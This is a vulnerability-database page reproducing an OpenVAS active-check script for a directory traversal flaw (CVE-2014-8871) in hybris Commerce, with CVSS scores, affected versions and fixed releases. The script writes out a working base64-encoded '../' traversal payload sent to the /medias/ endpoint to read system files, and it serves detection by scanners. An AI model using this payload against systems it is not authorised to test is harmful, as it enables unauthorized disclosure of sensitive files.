Lucene search

K
openvasCopyright (C) 2015 Greenbone AGOPENVAS:1361412562310105955
HistoryFeb 25, 2015 - 12:00 a.m.

hybris Commerce Directory Traversal Vulnerability (Feb 2015) - Active Check

2015-02-2500:00:00
Copyright (C) 2015 Greenbone AG
plugins.openvas.org
25

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

5 Medium

CVSS2

Access Vector

Access Complexity

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

0.002 Low

EPSS

Percentile

52.9%

hybris Commerce Software Suite is prone to a directory
traversal vulnerability.

# SPDX-FileCopyrightText: 2015 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.105955");
  script_version("2023-08-03T05:05:16+0000");
  script_tag(name:"last_modification", value:"2023-08-03 05:05:16 +0000 (Thu, 03 Aug 2023)");
  script_tag(name:"creation_date", value:"2015-02-25 14:49:12 +0700 (Wed, 25 Feb 2015)");
  script_tag(name:"cvss_base", value:"5.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:N/A:N");
  script_tag(name:"severity_vector", value:"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N");
  script_tag(name:"severity_origin", value:"NVD");
  script_tag(name:"severity_date", value:"2019-08-27 16:12:00 +0000 (Tue, 27 Aug 2019)");

  script_tag(name:"qod_type", value:"remote_vul");

  script_tag(name:"solution_type", value:"VendorFix");

  script_cve_id("CVE-2014-8871");

  script_name("hybris Commerce Directory Traversal Vulnerability (Feb 2015) - Active Check");

  script_category(ACT_ATTACK);

  script_copyright("Copyright (C) 2015 Greenbone AG");
  script_family("Web application abuses");
  script_dependencies("find_service.nasl", "httpver.nasl", "os_detection.nasl", "global_settings.nasl");
  script_require_ports("Services/www", 80);
  script_exclude_keys("Settings/disable_cgi_scanning");

  script_tag(name:"summary", value:"hybris Commerce Software Suite is prone to a directory
  traversal vulnerability.");

  script_tag(name:"vuldetect", value:"Sends a crafted HTTP GET request and checks the response.");

  script_tag(name:"insight", value:"Webshops based on hybris may use a file retrieval system where
  files are identified by a URL parameter named 'context' rather than a file name. The context is
  base64 encoded and consists among other parameters the file name. This file name is vulnerable to
  directory traversal.");

  script_tag(name:"impact", value:"An unauthenticated attacker can retrieve arbitrary files which
  might consist sensitive data which can be used for further attacks.");

  script_tag(name:"affected", value:"hybris Commerce Software Suite versions 5.0.0, 5.0.3, 5.0.4,
  5.1, 5.1.1, 5.2 and 5.3.");

  script_tag(name:"solution", value:"Update to version 5.0.0.4, 5.0.3.4, 5.0.4.5, 5.1.0.2,
  5.1.1.3, 5.2.0.4, 5.3.0.2 or later.");

  script_xref(name:"URL", value:"https://www.redteam-pentesting.de/advisories/rt-sa-2014-016");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/72681");

  exit(0);
}

include("host_details.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("misc_func.inc");
include("os_func.inc");
include("port_service_func.inc");

port = http_get_port(default: 80);

files = traversal_files();

foreach pattern (keys(files)) {

  file = files[pattern];

  payload_clear = "master|root|12345|text/plain|../../../../../../" + file + "|";
  payload_encoded = base64(str: payload_clear);

  url = "/medias/?context=" + payload_encoded;

  req = http_get(port:port, item:url);
  res = http_keepalive_send_recv(port:port, data:req);

  if (res && egrep(string:res, pattern:pattern)) {
    report = http_report_vuln_url(port:port, url:url);
    security_message(port:port, data:report);
    exit(0);
  }
}

exit(99);

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

5 Medium

CVSS2

Access Vector

Access Complexity

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

0.002 Low

EPSS

Percentile

52.9%

Related for OPENVAS:1361412562310105955